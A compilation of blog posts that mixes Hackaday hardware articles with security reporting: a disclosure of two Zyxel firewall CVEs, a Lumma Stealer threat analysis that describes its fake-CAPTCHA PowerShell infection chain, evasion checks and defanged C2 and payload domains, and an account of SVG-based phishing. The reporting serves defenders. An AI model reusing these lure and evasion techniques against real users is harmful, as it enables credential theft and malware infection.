HackerHood di RHC Rivela due nuovi 0day sui prodotti Zyxel
Il collettivo di ricerca in sicurezza informatica HackerHood, parte dell’universo della community di Red Hot Cyber, ha recentemente scoperto due nuove vulnerabilità nei dispositivi Zyxel, dimostrando ancora una volta l’importanza della ricerca proattiva nel contrasto alle minacce cibernetiche non documentate (cd. zeroday).
Entrambi i bug monitorati come CVE-2025-1731 e CVE-2025-1732 sono stati firmati dal ricercatore di Bug Alessandro Sgreccia mentre per il bug CVE-2025-1732 c’è anche la firma di un altro ricercatore di bug: Marco Ivaldi. Le vulnerabilità sono state isolate e prontamente inviate allo PSIRT di Zyxel.
CVE-2025-1731: Remote Code Execution on Zyxel USG FLEX H Series
- Prodotto: Zyxel USG FLEX H Series
- Ricercatore: Alessandro Sgreccia
- Link NIST: https://nvd.nist.gov/vuln/detail/CVE-2025-1731
- CVSSv3: 7,8
Durante le attività di ricerca di vulnerabilità non documentate sugli apparaty di Zyxel, è stato identificato un problema di sicurezza legato a un’applicazione di terze parti (PostgreSQL). Sebbene non siano state riscontrate vulnerabilità nella versione stessa di PostgreSQL, una configurazione errata consente a un utente malintenzionato di stabilire un tunnel SSH con port forwarding, esponendo il servizio di database (porta 5432) all’accesso esterno.
Normalmente, l’istanza di PostgreSQL è accessibile solo tramite localhost, limitando così la sua esposizione. Tuttavia, sfruttando il tunneling SSH, un utente malintenzionato può creare un canale di comunicazione diretto con il database da un sistema remoto. Il rischio è ulteriormente aggravato dall’assenza di requisiti di autenticazione per l’accesso al database, che consente a un aggressore di eseguire query arbitrarie e di ottenere l’esecuzione di codice remoto (RCE) creando una shell inversa come utente Postgres.
Zyxel USG FLEX H Series è una serie di firewall ad alte prestazioni progettata per soddisfare le esigenze di reti esigenti e ad alta velocità. Offre tempi di avvio più rapidi e migliori prestazioni delle CPU, che la rendono superiore alla serie USG FLEX standard.
CVE-2025-1732: Privilege Escalation
- Prodotto: Zyxel USG FLEX H Series
- Ricercatore: Alessandro Sgreccia e Marco Ivaldi
- Link NIST: nvd.nist.gov/vuln/detail/CVE-2…
- CVSSv3: 6,7
Questa vulnerabilità riguarda l’escalation dei privilegi attraverso l’uso improprio del bit SetUID su un binario personalizzato. Un utente non privilegiato può ottenere l’accesso root eseguendo una shell compilata staticamente con SetUID abilitato, che è stata precedentemente impacchettata in un archivio ZIP, trasferita tramite la funzione di recovery RMA di uOS ed estratta come root su un sistema vulnerabile.
In particolare, l’eseguibile della shell imposta esplicitamente UID e GID a 0 per aumentare i privilegi ed è compilato staticamente per evitare problemi di dipendenza che potrebbero impedire l’esecuzione. Impatto della vulnerabilità:
- Escalation dei privilegi → L’attaccante può ottenere una shell di root.
- Persistenza → L’attaccante può creare una backdoor per accessi futuri.
- Compromissione completa del sistema → L’attaccante può modificare i file critici del sistema.
Il ruolo di HackerHood nella scoperta
HackerHood, con 19 CVE emesse in due anni di attività, è il collettivo di ethical hacker di Red Hot Cyber che si impegna nella ricerca di vulnerabilità non documentate per garantire una sicurezza informatica più robusta. Il gruppo si basa su un manifesto che promuove la condivisione della conoscenza e il miglioramento della sicurezza collettiva, identificando e segnalando vulnerabilità critiche per proteggere utenti e aziende.
Secondo quanto riportato nel manifesto di HackerHood, il collettivo valorizza l’etica nella sicurezza informatica e incentiva la collaborazione tra i professionisti del settore. Questo caso dimostra l’importanza della loro missione: mettere al servizio della comunità globale le competenze di hacker etici per individuare minacce ancora sconosciute.
Unisciti a HackerHood
Se sei un bug hunter o un ricercatore di sicurezza e vuoi contribuire a iniziative di questo tipo, HackerHood è sempre aperto a nuovi talenti. Il collettivo accoglie esperti motivati a lavorare su progetti concreti per migliorare la sicurezza informatica globale. Invia un’email con le tue esperienze e competenze a info@hackerhood.it per unirti a questa squadra di professionisti.
La scoperta di CVE-2024-12398 è un ulteriore esempio del contributo significativo di HackerHood al panorama della sicurezza informatica. È essenziale che aziende e utenti finali prestino attenzione a tali scoperte, adottando le misure necessarie per prevenire eventuali exploit. La collaborazione tra ethical hacker, aziende e comunità resta una pietra miliare nella lotta contro le minacce cibernetiche.
Disclosure Timeline
- 2025-02-11: ZYXEL was notified via security@zyxel.com.tw.
- 2025-02-12: ZYXEL acknowledged receipt of my vulnerability report.
- 2025-02-20: ZYXEL’s Product team was unable to use the stolen ‘authtok’ to create an admin account
- and could not reproduce the issue. I provided them with a code modification to improve the exploit.
- 2025-02-25: ZYXEL’s Product team was still unable to reproduce the issue, so I requested access to the
- device for further investigation.
- 2025-02-25: ZYXEL PSIRT informed me that the RD Team Leader would contact me to grant access to
- their device.
- 2025-02-26: ZYXEL’s RD Team notified me that they were finally able to reproduce the issue.
- 2025-03-06: ZYXEL assigned CVE-2025-1731 and CVE-2025-1732 to the reported issues and
- informed me of their intention to publish their security advisory on 2025-04-15.
- 2025-04-08: ZYXEL requested to postpone the public disclosure date to April 22, 2025, as the firmware
- patch is scheduled for release on April 14, 2025, allowing users adequate time to apply the update and
- secure their systems before the vulnerability is disclosed.
- 2025-04-22: ZYXEL published their security advisory, following my coordinated disclosure timeline.
L'articolo HackerHood di RHC Rivela due nuovi 0day sui prodotti Zyxel proviene da il blog della sicurezza informatica.
Making Your Own Light Bulb Using a Jar, a Pencil, and Two Bolts
This Short from [ProShorts 101] shows us how to make an incandescent light bulb from a jar, a pencil lead, two bolts, and a candle.
Prepare the lid of the jar by melting in two holes to contain the bolts, you can do this with your soldering iron, but make sure your workspace is well ventilated and don’t breathe the fumes. Install the two bolts into the lid. Take a pencil lead and secure it between the two bolts. Chop off the tip of a candle and glue it inside the lid. Light the candle and while it’s burning cover it with the jar and screw on the lid. Apply power and your light bulb will glow.
The incandescent light bulb was invented by Thomas Edison and patented in patent US223898 in 1879. It’s important to remove the oxygen from the bulb so that the filament doesn’t burn up when it gets hot. That’s what the candle is for, to burn out all the oxygen in the jar before it’s sealed.
Of course if you want something that is energy efficient you’re going to want an LED light bulb.
youtube.com/embed/_ItOFyOTb8M?…
PoX: Super-Fast Graphene-Based Flash Memory
Recently a team at Fudan University claimed to have developed a picosecond-level Flash memory device (called ‘PoX’) that has an access time of a mere 400 picoseconds. This is significantly faster than the millisecond level access times of NAND Flash memory, and more in the ballpark of DRAM, while still being non-volatile. Details on the device technology were published in Nature.
In the paper by [Yutong Xing] et al. they describe the memory device as using a two-dimensional Dirac graphene-channel Flash memory structure, with hot carrier injection for both electron and hole injection, meaning that it is capable of both writing and erasing. Dirac graphene refers to the unusual electron transport properties of typical monolayer graphene sheets.
Demonstrated was a write speed of 400 picoseconds, non-volatile storage and a 5.5 × 106 cycle endurance with a programming voltage of 5 V. It are the unique properties of a Dirac material like graphene that allow these writes to occur significantly faster than in a typical silicon transistor device.
What is still unknown is how well this technology scales, its power usage, durability and manufacturability.
Jolly Wrencher Down to the Micron
RepRap was the origin of pushing hobby 3D printing boundaries, and here we see a RepRap scaled down to the smallest detail. [Vik Olliver] over at the RepRap blog has been working on getting a printer working printing down to the level of micron accuracy.
The printer is constructed using 3D printed flexures similar to the OpenFlecture microscope. Two flexures create the XYZ movement required for the tiny movements needed for micron level printing. While still in the stages of printing simple objects, the microscopic scale of printing is incredible. [Vik] managed to print a triangular pattern in resin at a total size of 300 µm. For comparison SLA 3D printers struggle at many times that scale. Other interesting possibilities from this technology could be printing small scale circuits from conductive resins, though this might require some customization in the resin department.
In addition to printing with resin, µRepRap can be seen making designs in marker ink such as our own Jolly Wrencher! At only 1.5 mm the detail is impressive especially when considering the nature of scratching away ink.
If you want to make your own µRepRap head over to [Vik Olliver]’s GitHub. The µRepRap project has been a long going project. From the time it started the design has changed quite a bit. Check out an older version of the µRepRap project based around OpenFlexture!
Trekulator: A Reproduction of the 1977 Star Trek Themed Calculator
A recent project over on Hackaday.io from [Michael Gardi] is Trekulator – Where No Maker Has Gone Before.
This is a fun build and [Michael] has done a very good job of emulating the original device. [Michael] used the Hackaday.io logging feature to log his progress. Starting in September 2024 he modeled the case, got his original hardware working, got the 7-segment display working, added support for sound, got the keypad working and mounted it, added the TFT display and mounted it, wired up the breadboard implementation, designed and implemented the PCBs, added some finishing touches, installed improved keys, and added a power socket back in March.
It is perhaps funny that where the original device used four red LEDs, [Michael] has used an entire TFT display. This would have been pure decadence by the standards of 1977. The software for the ESP32 microcontroller was fairly involved. It had to support audio, graphics, animations, keyboard input, the 7-segment display, and the actual calculations.
The calculations are done using double-precision floating-point values and eight positions on the display so this code will do weird things in some edge cases. For instance if you ask it to sum two eight digit numbers as 90,000,000 and 80,000,000, which would ordinarily sum to the nine digit value 170,000,000, the display will show you a different value instead, such as maybe 17,000,000 or 70,000,000. Why don’t you put one together and let us know what it actually does! Also, can you find any floating-point precision bugs?
This was a really fun project, thanks to [Michael] for writing it up and letting us know via the tips line!
youtube.com/embed/DtQb22XuGGM?…
youtube.com/embed/IBBv7u4kOjA?…
Remembering UCSD p-System, the Pascal Virtual Machine
Long before the Java Virtual Machine (JVM) was said to take the world by storm, the p-System (pseudo-system, or virtual machine) developed at the University of California, San Diego (UCSD) provided a cross-platform environment for the UCSD’s Pascal dialect. Later on, additional languages would also be made available for the UCSD p-System, such as Fortran (by Apple Computer) and Ada (by TeleSoft), not unlike the various languages targeting the JVM today in addition to Java. The p-System could be run on an existing OS or as its own OS directly on the hardware. This was extremely attractive in the fragmented home computer market of the 1980s.
After the final release of version IV of UCSD p-System (IV.2.2 R1.1) in 1987, the software died a slow death, but this doesn’t mean it is forgotten. People like [Hans Otten] have documented the history and technical details of the UCSD p-System, and the UCSD Pascal dialect went on to inspire Borland Pascal.
Recently [Mark Bessey] also reminisced about using the p-System in High School with computer programming classes back in 1986. This inspired him to look at re-experiencing Apple Pascal as well as UCSD Pascal on the UCSD p-System, possibly writing a p-System machine. Even if it’s just for nostalgia’s sake, it’s pretty cool to tinker with what is effectively the Java Virtual Machine or Common Language Runtime of the 1970s, decades before either of those were a twinkle in a software developer’s eyes.
Another common virtual runtime of the era was CHIP-8. It is also gone, but not quite forgotten.
Keebin’ with Kristina: the One with the Part Picker
If you do a lot of 3D computer work, I hear a Spacemouse is indispensable. So why not build a keyboard around it and make it a mouse-cropad?
Those switches are Kailh speed coppers, and they’re all wired up to a Seeed Xiao RP2040. [DethKlawMiniatures] says that making that lovely PCB by hand was a huge hassle, but impatience took over.
After a bit of use, [DethKlawMiniatures] says that the radial curve of the macro pad is nice, and the learning curve was okay. I think this baby looks fantastic, and I hope [DethKlawMiniatures] gets a lot of productivity out of it.
Kinesis Rides Again After 15 Years
Fifteen years ago, [mrmarbury] did a lot of ergo keyboard research and longed for a DataHand II. Once the sticker shock wore off, he settled on a Kinesis Advantage with MX browns just like your girl is typing on right now.
Anyway, things were going gangbusters for over a decade until [mrmarbury] spilled coffee on the thing. The main board shorted out, as did a thumb cluster trace. He did the Stapelberg mod to replace the main board, but that only lasted a little while until one of the key-wells’ flex boards came up defective. Yadda yadda yadda, he moved on and eventually got a Svalboard, which is pretty darn close to having a DataHand II.
But then a couple of months ago, the Kinesis fell on [mrmarbury]’s head while cleaning out a closet and he knew he had to fix it once and for all. He ripped out the flex boards and hand-wired it up to work with the Stapelberg mod. While the thumb clusters still have their browns and boards intact, the rest were replaced with Akko V3 Creme Blue Pros, which sound like they’re probably pretty amazing to type on. So far, so good, and it has quickly become [mrmarbury]’s favorite keyboard again. I can’t say I’m too surprised!
The Centerfold: Swingin’ Bachelor Pad
Do you rock a sweet set of peripherals on a screamin’ desk pad? Send me a picture along with your handle and all the gory details, and you could be featured here!
Historical Clackers: the IBM Selectric Composer
And what do we have here? This beauty is not a typewriter, exactly. It’s a typesetter. What this means is that, if used as directed, this machine can churn out text that looks like it was typeset on a printing press. You know, with the right margin justified.
To actually use the thing, you had to type your text twice. The first time, the machine measured the length of the line automatically and then report a color and number combination (like red-5) which was to be noted in the right margin.
The IBM Selectric Composer came out in 1966 and was a particularly expensive machine. Like, $35,000 in 2025 money expensive. IBM typically rented them out to companies and then trashed them when they came back, which, if you’re younger than a certain vintage, is why you’ve probably never seen one before.
If you just want to hear one clack, check out the short video below of a 1972 Selectric Composer where you can get a closer look at the dials. In 1975, the first Electronic Selectric Composer came out. I can’t even imagine how much those must have cost.
youtube.com/embed/Ba92fcE0bkI?…
Finally, a Keyboard Part Picker
Can’t decide what kind of keyboard to build? Not even sure what all there is to consider? Then you can’t go wrong with Curatle, a keyboard part picker built by [Careless-Pay9337] to help separate you from your hard-earned money in itemized fashion.
The only trouble is that currently, there’s no compatibility checking built in. It’ll be a long road, but it’s something that [Careless-Pay9337] does plan to implement in the future.
What else would you like to see? Be sure to let [Careless-Pay9337] know over in the reddit thread.
Got a hot tip that has like, anything to do with keyboards? Help me out by sending in a link or two. Don’t want all the Hackaday scribes to see it? Feel free to email me directly.
Restoration of Six-Player Arcade Game From the Early 90s
Although the video game crash of the mid-80s caused a major decline in arcades from their peak popularity, the industry didn’t completely die off. In fact, there was a revival that lasted until the 90s with plenty of companies like Capcom, Midway, SEGA, and Konami all competing to get quarters, francs, loonies, yen, and other coins from around the world. During this time, Namco — another game company — built a colossal 28-player prototype shooter game. Eventually, they cut it down to a (still titanic) six-player game that was actually released to the world. [PhilWIP] and his associates are currently restoring one of the few remaining room-sized games that are still surviving.
The game is called Galaxian 3, with this particular one having been upgraded to a version called “Attack of the Zolgear”. Even though it’s “only” a six-person shooter, it’s still enormous in scale. The six players sit side-by-side in an enclosed room, each with their own controller. Two projectors handle the display, which is large even by modern standards, and a gauntlet of early-90s technology, including LaserDisc players, is responsible for all of the gameplay. When [PhilWIP] first arrived, the game actually powered on, but there were several problems to solve before it was playable. They also wanted to preserve the game, which meant imaging the LaserDiscs to copy their data onto modern storage. Some of the player input PCBs needed repairs, and there were several issues with the projectors. Eventually the team got the system working well enough to play.
[PhilWIP] and the others haven’t gotten all the issues ironed out yet. The hope is that subsequent trips will restore this 90s novelty to working order shortly. It turns out there were all kinds of unique hardware from this wild-west era that’s in need of restoring, as we saw a few years ago with this early 3D cabinet from the same era.
Lumma Stealer – Tracking distribution channels
Introduction
The evolution of Malware-as-a-Service (MaaS) has significantly lowered the barriers to entry for cybercriminals, with information stealers becoming one of the most commercially successful categories in this underground economy. Among these threats, Lumma Stealer has emerged as a particularly sophisticated player since its introduction in 2022 by the threat actor known as Lumma. Initially marketed as LummaC2, this information stealer quickly gained traction in underground forums, with prices starting at $250. As of March 2025, its presence on dark web marketplaces and Telegram channels continues to grow, with over a thousand active subscribers.
LummaC2 seller’s official website
Lumma delivery usually involves human interaction, such as clicking a link, running malicious commands, etc. Recently, while investigating an incident as part of our incident response services, our Global Emergency Response Team (GERT) encountered Lumma on a customer’s system. The analysis revealed that the incident was triggered by human interaction, namely the user was tricked into executing a malicious command by a fake CAPTCHA page. In this article, we will review in detail how the fake CAPTCHA campaign works and share a list of IoCs that we discovered during our analysis and investigation of the campaign. Although we already described this distribution method in an earlier article, more details about this campaign have been discovered since then.
Lumma Stealer’s distribution vectors
Lumma Stealer’s distribution methods are diverse, using common techniques typically seen in information-stealing malware campaigns. Primary infection vectors include phishing emails with malicious attachments or links, as well as trojanized legitimate applications. These deceptive tactics trick users into executing the malware, which runs silently in the background harvesting valuable data. Lumma has also been observed using exploit kits, social engineering, and compromised websites to extend its reach and evade detection by security solutions. In this article, we’ll focus mainly on the fake CAPTCHA distribution vector.
This vector involves fake verification pages that resemble legitimate services, often hosted on platforms that use Content Delivery Networks (CDNs). These pages typically masquerade as frequently used CAPTCHAs, such as Google reCAPTCHA or Cloudflare CAPTCHA, to trick users into believing they are interacting with a trusted service.
Fake CAPTCHA distribution vectors
Fake CAPTCHA distribution scheme
There are two types of resources used to promote fake CAPTCHA pages:
- Pirated media, adult content, and cracked software sites. The attackers clone these websites and inject malicious advertisements into the cloned page that redirect users to a malicious CAPTCHA.
- Fake Telegram channels for pirated content and cryptocurrencies. The attackers create Telegram channels with names containing keywords related to cryptocurrencies or pirated content, such as software, movies, etc. When a user searches for such content, the fraudulent channels appear at the top of the search. The attackers also use social media posts to lure victims to these channels. When a user joins such a channel, they are prompted to complete an identity verification via a fraudulent “Safeguard Captcha” bot.
Safeguard Captcha botOnce the user clicks the Verify button, the bot opens a pop-up page with a fake CAPTCHA.
Fake CAPTCHA page
Users are presented with a pop-up page that looks like a standard CAPTCHA verification, prompting them to click I’m not a robot/Verify/Copy or some similar button. However, this is where the deception begins.
Fake CAPTCHA page examples
Fake page malicious content
When the I’m not a robot/Verify/Copy button is clicked, the user is instructed to perform an unusual sequence:
- Open the Run dialog(Win+R)
- Press Ctrl+V
- Hit Enter
Without the user’s knowledge, clicking the button automatically copies a PowerShell command to the clipboard. Once the user pastes the command into the Run dialog and presses Enter, the system executes the command.
Examples of scripts copied to the clipboard and executed via the Run dialog
The command may vary slightly from site to site and changes every few days, but it is typically used to download Lumma Stealer from a remote server, which is usually a known CDN with a free trial period or a legitimate code hosting and collaboration platform such as GitHub, and begin the malware installation process. Let’s take a closer look at this infection chain using the following command that was executed in our customer’s incident as an example:
Command triggering Lumma’s infection chain
The command is rather simple. It decodes and runs the contents from the remote win15.txt file hosted at https[:]//win15.b-cdn[.]net/win15.txt. The win15.txt file contains a Base64-encoded PowerShell script that then downloads and runs the Lumma Stealer. When decoded, the malicious PowerShell script looks like this:
Contents of win15.txt
The script performs the following actions:
- Downloads the malware. It downloads the win15.zip file from https[:]//win15.b-cdn[.]net/win15.zip to [User Profile]\AppData\Roaming\bFylC6zX.zip.
- Extracts the malware. The downloaded ZIP file is extracted to C:\Users\[User]\AppData\Roaming\7oCDTWYu, a hidden folder under the user’s AppData directory.
- Executes the malware. The script runs the Set-up.exe file from the unpacked archive, which is now located at C:\Users\[User]\AppData\Roaming\7oCDTWYu\Set-up.exe.
- Establishes persistence mechanism. The script creates an entry in the Windows Registry for persistency, ensuring that the malware runs every time the system starts. The registry key is added under HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. The key name is 5TQjtTuo, with the value pointing to Set-up.exe.
However, in some cases, the malware delivery mechanism can be more complex. In the following example, the delivery script is a JavaScript code hidden in what looks like an .mp3 file (other file formats such as .mp4 and .png have also been used). In fact, in addition to the JavaScript, the file may contain a corrupt .mp3/.mp4 file, legitimate software code, or just random data.
The script is executed using the Microsoft HTML Application engine mshta.exe by prompting the user to paste the following command into the Run dialog box:
Command triggering JS-based infection chain
The mshta command parses the file as an HTA file (Microsoft HTML Application) and executes any JavaScript code within the <script> tag, triggering the following infection chain:
Layer (1)
The JS script inside the .mp3 file is executed by mshta.
JS script within the never.mp3 file
Layer (2)
After calculating the Kwb value, the following script is obtained, which is then executed by the eval function.
Layer (2) JS script
Layer (3)
After calculating the values for kXN and zzI, the final ActiveX command is built and executed. It contains an encoded PowerShell script in the $PBwR variable.
Deobfuscated Layer (2) JS script
Layer (4)
After decoding the PowerShell script, we found that its main purpose is to download and execute another PowerShell file from the C2 path hXXps://connect[.]klipfuzj[.]shop/firefire[.]png.
Decrypted Layer (3) PowerShell script
Analysis for firefire.png
The file firefire.png is a huge PowerShell file (~31MB) with several layers of obfuscation and anti-debugging. After deobfuscating and removing unnecessary code, we could see that the main purpose of the file is to generate and execute an encrypted PowerShell script as follows:
firefire.png
The decryption key is the output of the Invoke-Metasploit command, which is blocked if the AMSI is enabled. As a result, an error message is generated by the AMSI: AMSI_RESULT_NOT_DETECTED, which is used as the key. If the AMSI is disabled, the malware will fail to decrypt the script.
The decrypted PowerShell script is approximately 1.5MB in size and its main purpose is to create and run a malicious executable file.
Decrypted PowerShell script
Infection methods and techniques
Lumma Stealer has been observed in the wild using a variety of infection methods, with two primary techniques standing out in its distribution campaigns: DLL sideloading and injection of a malicious payload into the overlay section of legitimate free software. These techniques are particularly effective at evading detection because they exploit the trust that users place in widely used applications and system processes.
- DLL sideloading
DLL sideloading is a well-known technique where malicious dynamic link libraries (DLLs) are loaded by a legitimate application. This technique exploits vulnerabilities or misconfigurations in software that inadvertently load DLL files from untrusted directories. Attackers can drop the Lumma Stealer DLL in the same directory as a trusted application, causing it to load when the application is executed. Because the malicious DLL is loaded in the context of a trusted process, it is much harder for traditional security measures to detect the intrusion. - Injection of malicious payload into the overlay section of software
Another method commonly used by Lumma Stealer is to inject a malicious payload into the overlay section of free software. The overlay section is typically used for legitimate software functionality, such as displaying graphical interfaces or handling certain input events. By modifying this section of the software, the adversary can inject the malicious payload without disrupting the normal operation of the application. This method is particularly insidious because the software continues to appear legitimate while the malicious code silently executes in the background. It also helps the malware evade detection by security tools that focus on system-level monitoring.
Both of these methods rely on exploiting trusted applications, which significantly increases the chances of successful infection. These techniques can be used in combination with others, such as phishing or trojanized software bundles, to maximize the spread of Lumma Stealer to multiple targets.
Sample analysis
To demonstrate how the Lumma Stealer installers work and the impact on systems and data security, we’ll analyze the stealer sample we found in the incident at our customer. This sample utilizes the overlay injection technique. Below is a detailed breakdown of the infection chain and the various techniques used to deploy and execute Lumma Stealer.
Initial execution and self-extracting RAR (SFX)
The initial payload in this sample is delivered as ProjectorNebraska.exe, which consists of a corrupt legitimate file and the malware in the overlay section. It is executed by the victim. Upon execution, the file extracts and runs a self-extracting RAR (SFX) archive. This archive contains the next stage of the infection: a Nullsoft Scriptable Install System (NSIS) installer. NSIS is a widely used tool for creating Windows installers.
NSIS installer components
The NSIS installer drops several components that are critical to the malware’s execution:
NSIS installer components
These include AutoIt components and an obfuscated batch script loader named Hose.cmd. The following AutoIt components are dropped:
- Fragments of a legitimate AutoIt executable: These are pieces of a genuine AutoIt executable that are dropped to the victim’s system, and then reassembled during the infection process.
- Compiled AutoIt script: The compiled script carries the core functionality of Lumma Stealer, including operations such as credential theft and data exfiltration.
These components are later reassembled into the final executable payload using the batch script loader that concatenates and executes the various fragments.
Hose.cmd orchestrates the final steps of the malware’s execution. Below is a breakdown of its key components (after deobfuscation):
Deobfuscated batch script code
Process tree after executing the batch script
The batch script performs the following actions:
- Security product evasion
- The script scans for the presence of security software (SecureAnywhere and Quick Heal AntiVirus) using the tasklist If either of them is detected, it delays execution via the ping -n 198 command, which pings localhost 198 times. This trick is used to avoid sandbox detection, as the sandbox typically exits before the script completes the ping task.
- The script checks for the presence of any of the following: Avast, AVG, McAfee, Bitdefender, Sophos, using the tasklist If one of them is detected, it keeps the executable name for AutoIt as AutoIt3.exe; otherwise, it renames it to Suggests.pif.
- Environment setup and payload preparation. It sets environment variables for the AutoIt executable and the final payload. It also creates a working directory named 195402 in the Temp directory to store malicious components.
- Obfuscation and extraction. The script filters and cleans a file named Sitting from the NSIS installer by removing the string OptimumSlipProfessionalsPerspective, and storing the result as Suggests.pif. It then uses the copy /b command to merge Suggests.pif with an additional component from the NSIS installer named Oclc into the AutoIt executable, saving it again as Suggests.pif.
- Payload assembly. It concatenates multiple files from the NSIS installer: Italy, Holmes, True, etc. to generate the final executable with the name h.a3x, which is an AutoIt script.
- Execution of Lumma Stealer. Finally, the script runs Suggests.pif, which in turn executes h.a3x, triggering the AutoIt-based execution of Lumma Stealer.
AutoIt script analysis
During the analysis, the AutoIt Extractor utility was used to decompile and extract the script from the h.a3x file. The script was heavily obfuscated and required additional deobfuscation to get a clean and analyzable .au3 script. Below is the analysis of the AutoIt loader’s behavior.
AutoIt script extraction
Anti-analysis checks
The script begins by validating the environment to detect analysis tools or sandbox environments. It checks for specific computer names and usernames often associated with testing environments.
Environment validation
It then checks for processes from popular antivirus tools such as Avast (avastui.exe), Bitdefender (bdagent.exe), and Kaspersky (avp.exe).
Anti-AV checks
If any of these conditions are met, the script halts execution to evade detection.
Executing loader shellcode
If the anti-analysis checks are passed, the script dynamically selects 32-bit or 64-bit shellcode based on the system architecture, which is located in the $vinylcigaretteau variable inside the script. To do this, it allocates executable memory and injects the shellcode into it. The shellcode then initializes the execution environment and prepares for the second-stage payload.
Part of the AutoIt loader responsible for the shellcode execution
Processing the $dayjoy payload
After executing the loader shellcode, the script processes the second-stage payload located in the $dayjoy variable. The payload is decrypted using RC4 with a hardcoded key 1246403907690944.
The encrypted payload
To decrypt the payload independently, we wrote a custom Python script that you can see in the screenshot below.
Python script for payload decryption
The decrypted payload is decompressed using the LZNT1 algorithm.
Payload decompression
Final payload execution
After decryption and decompression, the $dayjoy payload is executed in memory. The script uses DllCallAddress to invoke the payload directly in the allocated memory. This ensures the payload is executed stealthily without being written to disk.
Final payload execution
This final payload is the stealer itself. The malware’s comprehensive data theft capabilities target a wide range of sensitive information, including:
- Cryptocurrency wallet credentials (e.g., Binance, Ethereum) and associated browser extensions (e.g., MetaMask)
- Two-factor authentication (2FA) data and authenticator extensions
- Browser-stored credentials and cookies
- Stored credentials from remote access tools such as AnyDesk
- Stored credentials from password managers such as KeePass
- System and application data
- Financial information such as credit card numbers
C2 communication
Once Lumma Stealer is executed, it establishes communication with its command and control (C2) servers to exfiltrate the stolen data. The malware sends the collected information back to the attacker’s infrastructure for further exploitation. This communication is typically performed over HTTP or HTTPS, often disguised as legitimate traffic to avoid detection by network security monitoring tools.
C2 servers identified
The following C2 domains used by Lumma Stealer to communicate with the attackers were identified in the analyzed sample:
- reinforcenh[.]shop
- stogeneratmns[.]shop
- fragnantbui[.]shop
- drawzhotdog[.]shop
- vozmeatillu[.]shop
- offensivedzvju[.]shop
- ghostreedmnu[.]shop
- gutterydhowi[.]shop
These domains are used to receive stolen data from infected systems. Communication with these servers is typically via encrypted HTTP POST requests.
Conclusions
As a mass-distributed malicious program, Lumma Stealer employs a complex infection chain that includes a number of anti-analysis and detection evasion techniques, to stealthily infiltrate the victim’s device. Although the initial infection via dubious pirated software and cryptocurrency-related websites and Telegram channels suggests that individuals are the primary targets of these attacks, we saw Lumma in an incident at one of our customers, which illustrates that organizations can also fall victim to this threat. The information stolen by such malware may end up in the hands of more prominent cybercriminals, such as ransomware operators. That’s why it’s important to prevent stealer infections at the early stages. By understanding the infection techniques, security professionals can better defend against this growing threat and develop more effective detection and prevention strategies.
IoCs
The following list contains the URLs detected during our research. Note that the attackers change the malicious URLs and Telegram channels almost daily, and the IoCs provided in this section were already inactive at the time of writing. However, they may be useful for retrospective threat detection.
Malicious fake CAPTCHA pages
- seenga[.]com/page/confirm.html
- serviceverifcaptcho[.]com
- downloadsbeta[.]com
- intelligenceadx[.]com
- downloadstep[.]com
- nannyirrationalacquainted[.]com
- suspectplainrevulsion[.]com
- streamingsplays[.]com
- bot-detection-v1.b-cdn[.]net
- bot-check-v5.b-cdn[.]net
- spam-verification.b-cdn[.]net
- human-test.b-cdn[.]net
- b-cdn[.]net
- b-cdn[.]net
Telegram channels distributing Lumma
A digital conscious uncoupling
ANOTHER MONDAY, ANOTHER DIGITAL POLITICS. I'm Mark Scott, and you find me enjoying the four-day Easter weekend here in the United Kingdom. In honor of that, I give you my new favorite podcast.
In my day job, I'll be interviewing Brad Smith, Microsoft's president, in Brussels on April 30 at 10am CET. You can watch along here. For those of you who would like to attend in person, drop me a line here.
— Policymakers worldwide are now seriously considering a future where digital policymaking excludes the United States. Let's unpick what that means.
— It's official: Google is most definitely a monopoly, on both sides of the Atlantic. That will have far-reaching consequences — but it will take time.
— Digital rights civil society groups have been severely impacted by cuts in US government support. Here are the charts that explain the impact.
Let's get started:
Biasing Transistors with Current Sources
Over on his YouTube channel [Aaron Danner] explains biasing transistors with current sources in the 29th video of his Transistors Series. In this video, he shows how to replace a bias resistor (and consequently an additional capacitor) with a current source for both common-emitter and common-collector amplifiers.
A current source provides electrical energy with a constant current. The implication is that if the resistance of the load changes the current source will vary the voltage to compensate. In reality, this is exactly what you want. The usual resistor biasing arrangement just simulates this over a narrow voltage range, which is generally good enough, but not as good as a true current source.
As [Aaron] explains there are various advantages to biasing transistors with current sources instead of resistors, chief among them is that it allows you to get rid of a capacitor (capacitors are expensive to make in integrated circuits and often among the lowest-quality components in a design). You can also avoid losing some of your gain through the bias resistor.
The current source that [Aaron] uses in this video is known as a current mirror.
youtube.com/embed/kpd0uMzng8o?…
Phishing attacks leveraging HTML code inside SVG files
With each passing year, phishing attacks feature more and more elaborate techniques designed to trick users and evade security measures. Attackers employ deceptive URL redirection tactics, such as appending malicious website addresses to seemingly safe links, embed links in PDFs, and send HTML attachments that either host the entire phishing site or use JavaScript to launch it. Lately, we have noticed a new trend where attackers are distributing attachments in SVG format, the kind normally used for storing images.
SVG format
SVG (Scalable Vector Graphics) is a format for describing two-dimensional vector graphics using XML. This is how an SVG file appears when opened in image viewing software.
SVG image
But if you open it in a text editor, you can see the XML markup that describes the image. This markup allows for easy editing of image parameters, eliminating the need for resource-intensive graphics editors.
This is what an SVG file looks like when opened in a text editor
Since SVG is based on XML, it supports JavaScript and HTML, unlike JPEG or PNG. This makes it easier for designers to work with non-graphical content like text, formulas, and interactive elements. However, attackers are exploiting this by embedding scripts with links to phishing pages within the image file.
Sample SVG file with embedded HTML code. The tag introduces HTML markup
Phishing email campaigns leveraging SVG files
At the start of 2025, we observed phishing emails that resembled attacks with an HTML attachment, but instead utilized SVG files.
Phishing email with an SVG attachment
A review of the email’s source code shows that the attachment is identified as an image type.
The file as displayed in the email body
However, opening the file in a text editor reveals that it is essentially an HTML page with no mention of vector graphics.
Code of the SVG file
In a browser, this file appears as an HTML page with a link that supposedly points to an audio file.
SVG file viewed as HTML
Clicking the link redirects the user to a phishing page masquerading as Google Voice.
Phishing page mimicking Google Voice
The audio track at the top of the page is a static image. Clicking “Play Audio” redirects the user to a corporate email login page, allowing attackers to capture their credentials. This page, too, mentions Google Voice. The page also includes the target company’s logo, aiming to lower the user’s guard.
Login form
In a separate instance, mimicking a notification from an e-signature service, attackers presented an SVG attachment as a document that required review and signature.
Phishing e-signature request
Unlike the first example, where the SVG file acted as an HTML page, in this case it contains JavaScript that, when the file is opened, launches a browser window with a phishing site featuring a fake Microsoft login form.
Code of the SVG file
Phishing login form
Statistics
